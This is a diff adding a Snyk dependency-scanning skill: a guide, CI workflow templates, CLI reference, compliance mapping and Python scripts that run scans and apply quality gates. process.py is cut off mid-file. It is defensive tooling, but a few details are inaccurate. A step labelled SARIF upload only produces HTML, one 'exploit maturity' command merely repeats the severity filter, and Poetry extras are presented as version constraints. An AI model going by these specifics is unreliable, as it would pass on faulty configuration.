+**Do not use** for scanning proprietary application code for logic vulnerabilities (use SAST), for runtime vulnerability detection (use DAST), or for container OS package scanning alone (use Trivy for a free alternative).
+
+## Prerequisites
+
+- Snyk account (free tier covers up to 200 tests per month for open source)
+- Snyk CLI installed or Snyk GitHub/GitLab integration configured
+- SNYK_TOKEN environment variable set with API authentication token
+- Project with supported package manifests: package.json, requirements.txt, pom.xml, go.mod, Gemfile, etc.
+
+## Workflow
+
+### Step 1: Install and Authenticate Snyk CLI
+
+```bash
+# Install Snyk CLI
+npm install -g snyk
+
+# Authenticate with Snyk
+snyk auth $SNYK_TOKEN
+
+# Test the connection
+snyk test --json | jq '.summary'
+```
+
+### Step 2: Scan Dependencies in CI/CD Pipeline
+
+```yaml
+# .github/workflows/dependency-scan.yml
+name: Dependency Security Scan
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+  schedule:
+    - cron: '0 8 * * 1'  # Weekly Monday 8am
+
+jobs:
+  snyk-scan:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Setup Node.js
+        uses: actions/setup-node@v4
+        with:
+          node-version: '20'
+
+      - name: Install dependencies
+        run: npm ci
+
+      - name: Run Snyk to check for vulnerabilities
+        uses: snyk/actions/node@master
+        env:
+          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
+        with:
+          args: >
+            --severity-threshold=high
+            --fail-on=upgradable
+            --json-file-output=snyk-results.json
+
+      - name: Upload results to Snyk
+        if: always()
+        uses: snyk/actions/node@master
+        env:
+          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
+        with:
+          command: monitor
+          args: --project-name=${{ github.repository }}
+
+      - name: Upload SARIF
+        if: always()
+        run: |
+          npx snyk-to-html -i snyk-results.json -o snyk-report.html
+```
+
+### Step 3: Configure Snyk for Multiple Languages
+
+```bash
+# Python project scanning
+snyk test --file=requirements.txt --severity-threshold=high --json > snyk-python.json
+
+# Java/Maven project
+snyk test --file=pom.xml --severity-threshold=medium --json > snyk-java.json
+
+# Go module scanning
+snyk test --file=go.mod --severity-threshold=high --json > snyk-go.json
+
+# Docker image dependency scanning
+snyk container test myapp:latest --severity-threshold=high --json > snyk-container.json
+
+# Monorepo: scan all projects
+snyk test --all-projects --severity-threshold=high --json > snyk-all.json
+
+# IaC scanning (bonus)
+snyk iac test terraform/ --severity-threshold=medium --json > snyk-iac.json
+```
+
+### Step 4: Configure Snyk Policies for Organization
+
+```yaml
+# .snyk policy file
+version: v1.25.0
+ignore:
+  SNYK-JS-LODASH-1018905:
+    - '*':
+        reason: "Prototype pollution in lodash. Not exploitable in our usage - no user input reaches affected function."
+        expires: 2026-06-01T00:00:00.000Z
+        created: 2026-02-23T00:00:00.000Z
+
+  SNYK-PYTHON-REQUESTS-6241864:
+    - '*':
+        reason: "SSRF in requests redirect handling. Mitigated by allowlist at proxy layer."
+        expires: 2026-04-01T00:00:00.000Z
+
+patch: {}
+
+# Severity threshold for CI failures
+failOnSeverity: high
+```
+
+### Step 5: Enable Automated Fix Pull Requests
+
+```bash
+# Snyk fix: generate fix PRs for vulnerable dependencies
+snyk fix --dry-run  # Preview changes
+
+# Apply fixes locally
+snyk fix
+
+# Enable auto-fix PRs via Snyk dashboard:
+# 1. Navigate to Organization Settings > Integrations > GitHub
+# 2. Enable "Automatic fix pull requests"
+# 3. Set "Fix only direct dependencies" or "Fix direct and transitive"
+# 4. Configure branch target (main or develop)
+```
+
+### Step 6: License Compliance Scanning
+
+```bash
+# Check license compliance
+snyk test --json | jq '.licensesPolicy'
+
+# Snyk license policy configuration via organization settings:
+# - Approved licenses: MIT, Apache-2.0, BSD-2-Clause, BSD-3-Clause, ISC
+# - Restricted licenses: GPL-3.0, AGPL-3.0 (copyleft risk)
+# - Unknown licenses: Flag for manual review
+```
+
+## Key Concepts
+
+| Term | Definition |
+|------|------------|
+| SCA | Software Composition Analysis — identifies vulnerabilities and license risks in open-source dependencies |
+| Transitive Dependency | A dependency of a direct dependency, often invisible to developers but still a vulnerability vector |
+| Fix PR | Automated pull request generated by Snyk that upgrades a vulnerable dependency to a patched version |
+| Snyk Monitor | Continuous monitoring mode that watches deployed projects for newly disclosed vulnerabilities |
+| Exploit Maturity | Snyk's assessment of whether a vulnerability has known exploits, proof-of-concept, or no known exploit |
+| Reachable Vulnerability | A vulnerability in a function that is actually called by the application code, not just present in the dependency |
+| License Policy | Organization-level rules defining which open-source licenses are approved, restricted, or require review |
+
+## Tools & Systems
+
+- **Snyk Open Source**: SCA tool for scanning dependencies across 10+ language ecosystems
+- **Snyk CLI**: Command-line interface for local and CI/CD scanning of dependencies
+- **Snyk Advisor**: Package health scoring tool evaluating maintenance, popularity, and security signals
+- **OWASP Dependency-Check**: Free alternative SCA tool using NVD data for vulnerability matching
+- **npm audit / pip-audit**: Language-specific built-in audit tools for basic vulnerability checking
+
+## Common Scenarios
+
+### Scenario: Triaging a Critical Transitive Dependency Vulnerability
+
+**Context**: Snyk reports a critical RCE vulnerability in a transitive dependency (log4j in a Java application). The direct dependency has not released a patch.
+
+**Approach**:
+1. Use `snyk test --json` and examine the dependency path to identify which direct dependency pulls in the vulnerable transitive
+2. Check exploit maturity: if "Mature" or "Proof of Concept", prioritize immediately
+3. If no direct fix exists, use Snyk's patch mechanism or override the transitive version in the build config
+4. For Maven: add `<dependencyManagement>` section to force the safe version of the transitive dependency
+5. For npm: add an `overrides` section in package.json to pin the safe version
+6. Add a Snyk ignore with expiration date if no patch is available yet
+7. Monitor the direct dependency for a release that updates the transitive
+
+**Pitfalls**: Ignoring transitive vulnerabilities because "we don't use that function directly" is risky. Attackers can chain vulnerabilities across dependency boundaries. Version overrides can break API compatibility between the direct and transitive dependency.
+
+## Output Format
+
+```
+Snyk Dependency Scan Report
+=============================
+Project: org/web-application
+Manifest: package.json
+Dependencies: 342 (47 direct, 295 transitive)
+Scan Date: 2026-02-23
+
+VULNERABILITY SUMMARY:
+  Critical: 1  (1 fixable)
+  High: 4      (3 fixable)
+  Medium: 12   (8 fixable)
+  Low: 23      (15 fixable)
+
+CRITICAL:
+  SNYK-JS-EXPRESS-1234567
+    Package: express@4.17.1 (direct)
+    Severity: Critical (CVSS 9.8)
+    Exploit: Mature
+    Fix: Upgrade to express@4.21.0
+    Path: express@4.17.1
+
+HIGH:
+  SNYK-JS-JSONWEBTOKEN-5678901
+    Package: jsonwebtoken@8.5.1 (transitive)
+    Severity: High (CVSS 7.6)
+    Exploit: Proof of Concept
+    Fix: Upgrade passport@0.7.0 (which upgrades jsonwebtoken)
+    Path: passport@0.6.0 > jsonwebtoken@8.5.1
+
+LICENSE ISSUES:
+  [RESTRICTED] GPL-3.0: some-package@1.2.3 (transitive via other-pkg)
+
+QUALITY GATE: FAILED (1 Critical with fix available)
+```

--- a/security/skills/performing-sca-dependency-scanning-with-snyk/assets/template.md
+++ b/security/skills/performing-sca-dependency-scanning-with-snyk/assets/template.md
@@ -1,0 +1,131 @@
+# Snyk SCA Scanning Templates
+
+## GitHub Actions: Multi-Language SCA Pipeline
+
+```yaml
+# .github/workflows/sca-scanning.yml
+name: SCA Dependency Scan
+
+on:
+  push:
+    branches: [main]
+  pull_request:
+    branches: [main]
+    paths:
+      - 'package*.json'
+      - 'requirements*.txt'
+      - 'Pipfile*'
+      - 'pom.xml'
+      - 'build.gradle*'
+      - 'go.mod'
+      - 'Gemfile*'
+
+jobs:
+  snyk-node:
+    name: Snyk Node.js
+    runs-on: ubuntu-latest
+    if: hashFiles('package.json') != ''
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-node@v4
+        with: { node-version: '20' }
+      - run: npm ci
+      - uses: snyk/actions/node@master
+        env:
+          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
+        with:
+          args: --severity-threshold=high --fail-on=upgradable
+
+  snyk-python:
+    name: Snyk Python
+    runs-on: ubuntu-latest
+    if: hashFiles('requirements.txt') != ''
+    steps:
+      - uses: actions/checkout@v4
+      - uses: actions/setup-python@v5
+        with: { python-version: '3.12' }
+      - run: pip install -r requirements.txt
+      - uses: snyk/actions/python-3.10@master
+        env:
+          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
+        with:
+          args: --severity-threshold=high
+
+  monitor:
+    name: Snyk Monitor
+    needs: [snyk-node, snyk-python]
+    if: github.ref == 'refs/heads/main'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - uses: snyk/actions/node@master
+        env:
+          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
+        with:
+          command: monitor
+          args: --all-projects
+```
+
+## Snyk Policy File
+
+```yaml
+# .snyk
+version: v1.25.0
+ignore:
+  # Accepted risk with documented justification and expiry
+  SNYK-JS-LODASH-1018905:
+    - '*':
+        reason: "Not exploitable: user input never reaches _.template()"
+        expires: 2026-06-01T00:00:00.000Z
+        created: 2026-02-23T00:00:00.000Z
+
+patch: {}
+```
+
+## Snyk Configuration for License Compliance
+
+```json
+{
+  "org_settings": {
+    "license_policy": {
+      "approved": ["MIT", "Apache-2.0", "BSD-2-Clause", "BSD-3-Clause", "ISC", "Unlicense", "0BSD"],
+      "review_required": ["LGPL-2.1", "LGPL-3.0", "MPL-2.0", "CDDL-1.0"],
+      "restricted": ["GPL-2.0", "GPL-3.0", "AGPL-3.0", "SSPL-1.0"],
+      "severity_for_unknown": "high"
+    }
+  }
+}
+```
+
+## OWASP Dependency-Check Alternative (Free)
+
+```yaml
+# .github/workflows/dependency-check.yml
+name: OWASP Dependency Check
+
+on:
+  push:
+    branches: [main]
+  schedule:
+    - cron: '0 8 * * 1'
+
+jobs:
+  dependency-check:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Run OWASP Dependency-Check
+        uses: dependency-check/Dependency-Check_Action@main
+        with:
+          project: 'my-app'
+          path: '.'
+          format: 'HTML'
+          args: >
+            --failOnCVSS 7
+            --enableRetired
+      - name: Upload report
+        uses: actions/upload-artifact@v4
+        with:
+          name: dependency-check-report
+          path: reports/
+```

--- a/security/skills/performing-sca-dependency-scanning-with-snyk/references/api-reference.md
+++ b/security/skills/performing-sca-dependency-scanning-with-snyk/references/api-reference.md
@@ -1,0 +1,80 @@
+# SCA Dependency Scanning with Snyk - API Reference
+
+## Snyk CLI Commands
+
+### snyk test
+Scans project dependencies for known vulnerabilities.
+
+```bash
+snyk test --json --severity-threshold=high
+snyk test --json --all-projects          # Monorepo support
+snyk test --json --file=package-lock.json
+```
+
+Exit codes:
+- 0: No vulnerabilities found
+- 1: Vulnerabilities found
+- 2: Failure (missing manifest, auth error)
+
+### snyk monitor
+Creates a project snapshot for continuous monitoring on snyk.io.
+
+```bash
+snyk monitor --json --project-name="my-app"
+```
+
+### snyk auth
+Authenticate with Snyk API token.
+
+```bash
+snyk auth <API_TOKEN>
+export SNYK_TOKEN=<API_TOKEN>
+```
+
+## JSON Output Structure
+
+### Test Result Fields
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `vulnerabilities` | array | List of vulnerability objects |
+| `ok` | boolean | True if no vulns found |
+| `dependencyCount` | int | Total dependencies scanned |
+| `packageManager` | string | npm, pip, maven, etc. |
+| `uniqueCount` | int | Unique vulnerability count |
+
+### Vulnerability Object
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `id` | string | Snyk vulnerability ID (e.g., `SNYK-JS-LODASH-590103`) |
+| `title` | string | Human-readable title |
+| `severity` | string | critical, high, medium, low |
+| `cvssScore` | float | CVSS v3.1 score (0-10) |
+| `packageName` | string | Affected package name |
+| `version` | string | Installed version |
+| `fixedIn` | array | Versions with fix available |
+| `exploit` | string | Exploit maturity: Mature, Proof of Concept, Not Defined |
+| `isUpgradable` | boolean | Can be fixed by upgrading direct dependency |
+| `isPatchable` | boolean | Snyk patch available |
+| `from` | array | Dependency path from root |
+
+## SARIF Integration
+
+Snyk results can be converted to SARIF 2.1.0 for GitHub Code Scanning. The SARIF schema is at:
+`https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json`
+
+## Severity Mapping
+
+| Snyk Severity | CVSS Range | SARIF Level |
+|---------------|-----------|-------------|
+| critical | 9.0 - 10.0 | error |
+| high | 7.0 - 8.9 | error |
+| medium | 4.0 - 6.9 | warning |
+| low | 0.1 - 3.9 | warning |
+
+## CLI Usage
+
+```bash
+python agent.py --project /app --severity high --max-critical 0 --max-high 5 --output report.json
+```

--- a/security/skills/performing-sca-dependency-scanning-with-snyk/references/standards.md
+++ b/security/skills/performing-sca-dependency-scanning-with-snyk/references/standards.md
@@ -1,0 +1,63 @@
+# Standards Reference: SCA Dependency Scanning with Snyk
+
+## OWASP Top 10 - A06:2021 Vulnerable and Outdated Components
+
+- Applications using components with known vulnerabilities may be exploitable
+- SCA tools like Snyk identify vulnerable versions and provide upgrade paths
+- Includes both direct and transitive dependency scanning
+
+## NIST SSDF (SP 800-218)
+
+### PW.4: Reuse Existing, Well-Secured Software
+- PW.4.1: Verify that acquired software meets security requirements
+- PW.4.2: Review, analyze, and test software to identify vulnerabilities
+- SCA scanning of all third-party components before integration
+
+### PW.4.4: Maintain Provenance Data
+- Track the origin and version of all third-party software components
+- Snyk monitor provides continuous tracking of dependency versions
+
+## CIS Software Supply Chain Security
+
+### Dependencies (DP) Controls
+- DP-1: Pin dependencies to specific versions
+- DP-2: Automate dependency vulnerability scanning in CI/CD
+- DP-3: Review and approve new dependency additions
+- DP-4: Monitor deployed dependencies for newly disclosed vulnerabilities
+
+## OWASP SAMM - Software Security
+
+### Security Testing - Maturity Level 1
+- Automated dependency scanning using default configurations
+- Visibility of vulnerable components to development teams
+
+### Security Testing - Maturity Level 2
+- Custom policies for severity thresholds and license compliance
+- Automated fix PRs for upgradable vulnerabilities
+- Tracking of exploit maturity to prioritize remediation
+
+### Security Testing - Maturity Level 3
+- Reachability analysis to identify actually exploitable vulnerabilities
+- Integration with vulnerability management for SLA tracking
+- Correlation with runtime monitoring for risk-based prioritization
+
+## PCI DSS v4.0
+
+- 6.2.4: Use automated methods to prevent common software attacks
+- 6.3.2: Maintain an inventory of custom and third-party software components
+- 6.3.3: Software components not needed for operation removed or identified
+
+## Executive Order 14028 (US Federal)
+
+- Section 4(e): Agencies shall employ automated tools for continuous monitoring of vulnerabilities in software
+- SBOM requirement: All software suppliers must provide SBOMs listing all components including open-source
+- Aligns with Snyk's SBOM generation and continuous monitoring capabilities
+
+## License Compliance Framework
+
+| License Type | Risk Level | Policy | Examples |
+|--------------|------------|--------|----------|
+| Permissive | Low | Auto-approve | MIT, BSD-2, BSD-3, ISC, Apache-2.0 |
+| Weak Copyleft | Medium | Review | LGPL-2.1, LGPL-3.0, MPL-2.0 |
+| Strong Copyleft | High | Restrict | GPL-2.0, GPL-3.0, AGPL-3.0 |
+| Unknown/Custom | High | Manual Review | Proprietary, SSPL, BSL |

--- a/security/skills/performing-sca-dependency-scanning-with-snyk/references/workflows.md
+++ b/security/skills/performing-sca-dependency-scanning-with-snyk/references/workflows.md
@@ -1,0 +1,130 @@
+# Workflow Reference: SCA Dependency Scanning with Snyk
+
+## Dependency Scanning Pipeline
+
+```
+Code Push / PR
+       │
+       ▼
+┌──────────────────┐
+│ Install Deps     │
+│ (npm ci, pip     │
+│  install, etc.)  │
+└──────┬───────────┘
+       │
+       ▼
+┌──────────────────┐
+│ Snyk Test        │──── Report JSON ───> Artifact Storage
+│ (vuln scan)      │
+└──────┬───────────┘
+       │
+  ┌────┴────┐
+  │         │
+PASS      FAIL ──────> PR Comment with vuln details
+  │                     │
+  │                     ▼
+  │              ┌──────────────┐
+  │              │ Snyk Fix PR  │
+  │              │ (auto-gen)   │
+  │              └──────────────┘
+  ▼
+┌──────────────────┐
+│ Snyk Monitor     │
+│ (continuous)     │
+└──────┬───────────┘
+       │
+       ▼
+  Ongoing alerts for
+  new disclosures
+```
+
+## Snyk CLI Command Reference
+
+### Scanning Commands
+```bash
+# Basic vulnerability test
+snyk test
+
+# Test with severity filter
+snyk test --severity-threshold=high
+
+# Test with exploit maturity filter
+snyk test --severity-threshold=high
+
+# Test specific manifest
+snyk test --file=package-lock.json
+
+# Test all projects in monorepo
+snyk test --all-projects
+
+# Test with dev dependencies excluded
+snyk test --production
+
+# Output in JSON
+snyk test --json --json-file-output=results.json
+
+# Output in SARIF
+snyk test --sarif --sarif-file-output=results.sarif
+```
+
+### Monitoring Commands
+```bash
+# Monitor project for new vulnerabilities
+snyk monitor --project-name="my-app-prod"
+
+# Monitor specific branch
+snyk monitor --target-reference=main
+
+# Monitor with tags
+snyk monitor --project-tags=env=production,team=platform
+```
+
+### Fix Commands
+```bash
+# Preview available fixes
+snyk fix --dry-run
+
+# Apply fixes to direct dependencies
+snyk fix
+
+# Apply fixes including dev dependencies
+snyk fix --dev
+```
+
+## Vulnerability Prioritization Matrix
+
+| Factor | Score Weight | Description |
+|--------|-------------|-------------|
+| CVSS Score | 30% | Base vulnerability severity |
+| Exploit Maturity | 25% | Mature > POC > No Known Exploit |
+| Reachability | 20% | Function called > Imported > Present |
+| Fix Availability | 15% | Upgrade available > Patch > None |
+| Dependency Depth | 10% | Direct > Transitive (1 hop) > Deep transitive |
+
+## Snyk Integration Options
+
+| Platform | Integration Method | Features |
+|----------|--------------------|----------|
+| GitHub | GitHub App | Auto-scan PRs, fix PRs, SARIF upload |
+| GitLab | GitLab Integration | MR comments, dependency scanning |
+| Jenkins | Snyk Plugin | Pipeline step, HTML reports |
+| Azure DevOps | Extension | Pipeline task, dashboard widget |
+| Bitbucket | Bitbucket App | PR checks, fix PRs |
+| CLI | npm/binary | Local scanning, CI/CD integration |
+
+## Remediation Strategy by Vulnerability Type
+
+### Direct Dependency Vulnerability
+1. Check if upgrade is available: `snyk test --json | jq '.vulnerabilities[] | select(.isUpgradable)'`
+2. If upgradable: run `snyk fix` or manually upgrade
+3. Verify no breaking changes in the upgrade
+4. If not upgradable: check for patch or accept risk with ignore
+
+### Transitive Dependency Vulnerability
+1. Identify the dependency chain: `snyk test --json | jq '.vulnerabilities[].from'`
+2. Check if upgrading the direct dependency resolves it
+3. If not: use version overrides in package manager
+4. npm: `overrides` in package.json
+5. Maven: `dependencyManagement` in pom.xml
+6. Gradle: `constraints` in build.gradle
+7. Poetry: `tool.poetry.extras` or constraint resolution

--- a/security/skills/performing-sca-dependency-scanning-with-snyk/scripts/agent.py
+++ b/security/skills/performing-sca-dependency-scanning-with-snyk/scripts/agent.py
@@ -1,0 +1,160 @@
+#!/usr/bin/env python3
+"""SCA Dependency Scanning with Snyk agent — runs Snyk CLI to test
+project dependencies for known vulnerabilities, generates SARIF output,
+and enforces quality gates."""
+
+import argparse
+import json
+import subprocess
+from datetime import datetime
+from pathlib import Path
+
+
+def run_snyk_test(project_path: str, severity_threshold: str = "low",
+                  extra_args: list = None) -> dict:
+    """Run snyk test and return parsed JSON results."""
+    cmd = ["snyk", "test", "--json", f"--severity-threshold={severity_threshold}"]
+    if extra_args:
+        cmd.extend(extra_args)
+    try:
+        result = subprocess.run(cmd, capture_output=True, text=True,
+                                cwd=project_path, timeout=300)
+        if result.stdout:
+            return json.loads(result.stdout)
+        return {"error": result.stderr, "exit_code": result.returncode}
+    except subprocess.TimeoutExpired:
+        return {"error": "Snyk test timed out after 300s"}
+    except FileNotFoundError:
+        return {"error": "snyk CLI not found. Install: npm install -g snyk"}
+    except json.JSONDecodeError:
+        return {"error": "Failed to parse Snyk output", "raw": result.stdout[:2000]}
+
+
+def run_snyk_monitor(project_path: str) -> dict:
+    """Run snyk monitor to create a snapshot for continuous monitoring."""
+    cmd = ["snyk", "monitor", "--json"]
+    try:
+        result = subprocess.run(cmd, capture_output=True, text=True,
+                                cwd=project_path, timeout=300)
+        if result.stdout:
+            return json.loads(result.stdout)
+        return {"error": result.stderr}
+    except (subprocess.TimeoutExpired, FileNotFoundError, json.JSONDecodeError) as e:
+        return {"error": str(e)}
+
+
+def parse_vulnerabilities(snyk_result: dict) -> list[dict]:
+    """Extract and normalize vulnerability findings."""
+    vulns = snyk_result.get("vulnerabilities", [])
+    findings = []
+    for v in vulns:
+        findings.append({
+            "id": v.get("id", ""),
+            "title": v.get("title", ""),
+            "severity": v.get("severity", "unknown"),
+            "cvss_score": v.get("cvssScore", 0),
+            "package": v.get("packageName", ""),
+            "version": v.get("version", ""),
+            "fixed_in": v.get("fixedIn", []),
+            "exploit_maturity": v.get("exploit", "Not Defined"),
+            "is_upgradable": v.get("isUpgradable", False),
+            "is_patchable": v.get("isPatchable", False),
+            "from_path": v.get("from", []),
+        })
+    return findings
+
+
+def apply_quality_gate(findings: list[dict], max_critical: int = 0,
+                       max_high: int = 5) -> dict:
+    """Apply quality gate based on severity counts."""
+    counts = {"critical": 0, "high": 0, "medium": 0, "low": 0}
+    for f in findings:
+        sev = f.get("severity", "low").lower()
+        counts[sev] = counts.get(sev, 0) + 1
+
+    passed = counts["critical"] <= max_critical and counts["high"] <= max_high
+    return {
+        "passed": passed,
+        "severity_counts": counts,
+        "gate_criteria": {"max_critical": max_critical, "max_high": max_high},
+        "reason": "PASS" if passed else f"FAIL: {counts['critical']} critical (max {max_critical}), {counts['high']} high (max {max_high})",
+    }
+
+
+def generate_sarif(findings: list[dict], project_path: str) -> dict:
+    """Convert findings to SARIF 2.1.0 format for GitHub integration."""
+    rules = []
+    results = []
+    seen_ids = set()
+    for f in findings:
+        rule_id = f["id"]
+        if rule_id not in seen_ids:
+            rules.append({
+                "id": rule_id,
+                "shortDescription": {"text": f["title"]},
+                "defaultConfiguration": {
+                    "level": "error" if f["severity"] in ("critical", "high") else "warning"
+                },
+            })
+            seen_ids.add(rule_id)
+        results.append({
+            "ruleId": rule_id,
+            "message": {"text": f"{f['title']} in {f['package']}@{f['version']}"},
+            "level": "error" if f["severity"] in ("critical", "high") else "warning",
+        })
+
+    return {
+        "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json",
+        "version": "2.1.0",
+        "runs": [{
+            "tool": {"driver": {"name": "Snyk", "rules": rules}},
+            "results": results,
+        }],
+    }
+
+
+def generate_report(project_path: str, severity_threshold: str,
+                    max_critical: int, max_high: int) -> dict:
+    """Run full scan and build consolidated report."""
+    snyk_result = run_snyk_test(project_path, severity_threshold)
+    if "error" in snyk_result and "vulnerabilities" not in snyk_result:
+        return {"report": "sca_dependency_scan", "error": snyk_result["error"]}
+
+    findings = parse_vulnerabilities(snyk_result)
+    gate = apply_quality_gate(findings, max_critical, max_high)
+    sarif = generate_sarif(findings, project_path)
+
+    return {
+        "report": "sca_dependency_scan",
+        "generated_at": datetime.utcnow().isoformat() + "Z",
+        "project_path": project_path,
+        "total_vulnerabilities": len(findings),
+        "quality_gate": gate,
+        "unique_packages_affected": len(set(f["package"] for f in findings)),
+        "upgradable_count": sum(1 for f in findings if f["is_upgradable"]),
+        "patchable_count": sum(1 for f in findings if f["is_patchable"]),
+        "findings": findings,
+        "sarif": sarif,
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(description="SCA Dependency Scanning with Snyk Agent")
+    parser.add_argument("--project", required=True, help="Project directory to scan")
+    parser.add_argument("--severity", default="low", choices=["low", "medium", "high", "critical"])
+    parser.add_argument("--max-critical", type=int, default=0, help="Max critical vulns for quality gate")
+    parser.add_argument("--max-high", type=int, default=5, help="Max high vulns for quality gate")
+    parser.add_argument("--output", help="Output JSON file path")
+    args = parser.parse_args()
+
+    report = generate_report(args.project, args.severity, args.max_critical, args.max_high)
+    output = json.dumps(report, indent=2)
+    if args.output:
+        Path(args.output).write_text(output, encoding="utf-8")
+        print(f"Report written to {args.output}")
+    else:
+        print(output)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-sca-dependency-scanning-with-snyk/scripts/process.py
+++ b/security/skills/performing-sca-dependency-scanning-with-snyk/scripts/process.py
@@ -1,0 +1,266 @@
+#!/usr/bin/env python3
+"""
+Snyk SCA Dependency Scanning Pipeline Script
+
+Orchestrates Snyk dependency scans, evaluates quality gates,
+and generates consolidated vulnerability reports.
+
+Usage:
+    python process.py --project-path /path/to/project --severity-threshold high
+    python process.py --project-path . --manifest package.json --output report.json
+"""
+
+import argparse
+import json
+import os
+import subprocess
+import sys
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+from typing import Optional
+
+
+SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}
+
+
+@dataclass
+class VulnFinding:
+    snyk_id: str
+    title: str
+    severity: str
+    cvss_score: float
+    package_name: str
+    installed_version: str
+    fixed_version: str
+    exploit_maturity: str
+    is_upgradable: bool
+    is_patchable: bool
+    dependency_path: list = field(default_factory=list)
+    cwe: list = field(default_factory=list)
+
+
+@dataclass
+class LicenseIssue:
+    package_name: str
+    version: str
+    license_id: str
+    severity: str
+    dependency_type: str
+
+
+def run_snyk_test(project_path: str, manifest: Optional[str] = None,
+                  severity_threshold: str = "low",
+                  all_projects: bool = False) -> dict:
+    """Execute Snyk test and return JSON results."""
+    cmd = ["snyk", "test", "--json"]
+
+    if manifest:
+        cmd.extend(["--file", manifest])
+    if all_projects:
+        cmd.append("--all-projects")
+    cmd.extend(["--severity-threshold", severity_threshold])
+
+    try:
+        proc = subprocess.run(
+            cmd,
+            cwd=project_path,
+            capture_output=True,
+            text=True,
+            timeout=300
+        )
+
+        if proc.stdout:
+            try:
+                return json.loads(proc.stdout)
+            except json.JSONDecodeError:
+                return {"error": "Failed to parse Snyk JSON output"}
+        return {"error": proc.stderr[:500]}
+
+    except subprocess.TimeoutExpired:
+        return {"error": "Snyk test timed out after 300 seconds"}
+    except FileNotFoundError:
+        return {"error": "snyk CLI not found. Install with: npm install -g snyk"}
+
+
+def parse_vulnerabilities(snyk_json: dict) -> list:
+    """Parse Snyk JSON output into VulnFinding objects."""
+    vulns = []
+    vuln_list = snyk_json.get("vulnerabilities", [])
+
+    for v in vuln_list:
+        vulns.append(VulnFinding(
+            snyk_id=v.get("id", ""),
+            title=v.get("title", ""),
+            severity=v.get("severity", "low"),
+            cvss_score=v.get("cvssScore", 0.0),
+            package_name=v.get("packageName", ""),
+            installed_version=v.get("version", ""),
+            fixed_version=v.get("fixedIn", ["none"])[0] if v.get("fixedIn") else "none",
+            exploit_maturity=v.get("exploit", "No Known Exploit"),
+            is_upgradable=v.get("isUpgradable", False),
+            is_patchable=v.get("isPatchable", False),
+            dependency_path=v.get("from", []),
+            cwe=v.get("identifiers", {}).get("CWE", [])
+        ))
+
+    return vulns
+
+
+def deduplicate_vulns(vulns: list) -> list:
+    """Remove duplicate vulnerability entries (same ID + package)."""
+    seen = set()
+    unique = []
+    for v in vulns:
+        key = f"{v.snyk_id}:{v.package_name}:{v.installed_version}"
+        if key not in seen:
+            seen.add(key)
+            unique.append(v)
+    return unique
+
+
+def evaluate_quality_gate(vulns: list, threshold: str,
+                          fail_on: str = "all") -> dict:
+    """Evaluate quality gate based on vulnerability severity."""
+    threshold_level = SEVERITY_ORDER.get(threshold.lower(), 1)
+
+    blocking = []
+    for v in vulns:
+        if SEVERITY_ORDER.get(v.severity.lower(), 3) <= threshold_level:
+            if fail_on == "upgradable" and not v.is_upgradable:
+                continue
+            blocking.append(v)
+
+    severity_counts = {}
+    for v in vulns:
+        sev = v.severity.lower()
+        severity_counts[sev] = severity_counts.get(sev, 0) + 1
+
+    fixable_count = sum(1 for v in vulns if v.is_upgradable or v.is_patchable)
+
+    return {
+        "passed": len(blocking) == 0,
+        "threshold": threshold,
+        "fail_on": fail_on,
+        "total_vulnerabilities": len(vulns),
+        "blocking_count": len(blocking),
+        "fixable_count": fixable_count,
+        "severity_counts": severity_counts,
+        "blocking_details": [
+            {
+                "id": v.snyk_id,
+                "title": v.title,
+                "severity": v.severity,
+                "package": f"{v.package_name}@{v.installed_version}",
+                "fix": v.fixed_version,
+                "upgradable": v.is_upgradable,
+                "exploit": v.exploit_maturity
+            }
+            for v in blocking[:20]
+        ]
+    }
+
+
+def generate_report(vulns: list, quality_gate: dict, snyk_json: dict,
+                    project_path: str) -> dict:
+    """Generate consolidated SCA report."""
+    dep_count = snyk_json.get("dependencyCount", 0)
+
+    exploit_summary = {}
+    for v in vulns:
+        exploit_summary[v.exploit_maturity] = exploit_summary.get(v.exploit_maturity, 0) + 1
+
+    return {
+        "report_metadata": {
+            "project": project_path,
+            "scan_date": datetime.now(timezone.utc).isoformat(),
+            "total_dependencies": dep_count
+        },
+        "quality_gate": quality_gate,
+        "exploit_maturity_breakdown": exploit_summary,
+        "vulnerabilities": [
+            {
+                "id": v.snyk_id,
+                "title": v.title,
+                "severity": v.severity,
+                "cvss": v.cvss_score,
+                "package": v.package_name,
+                "version": v.installed_version,
+                "fixed_in": v.fixed_version,
+                "exploit": v.exploit_maturity,
+                "upgradable": v.is_upgradable,
+                "path": " > ".join(v.dependency_path[:4]),
+                "cwe": v.cwe
+            }
+            for v in sorted(vulns, key=lambda x: SEVERITY_ORDER.get(x.severity.lower(), 3))
+        ]
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Snyk SCA Dependency Scanning Pipeline")
+    parser.add_argument("--project-path", required=True, help="Path to project")
+    parser.add_argument("--manifest", default=None, help="Manifest file (e.g., package.json)")
+    parser.add_argument("--output", default="snyk-report.json", help="Output report path")
+    parser.add_argument("--severity-threshold", default="high",
+                        choices=["critical", "high", "medium", "low"])
+    parser.add_argument("--fail-on", default="all", choices=["all", "upgradable"],
+                        help="Fail on all vulns or only upgradable ones")
+    parser.add_argument("--fail-on-findings", action="store_true")
+    parser.add_argument("--all-projects", action="store_true",
+                        help="Scan all projects in monorepo")
+    parser.add_argument("--monitor", action="store_true",
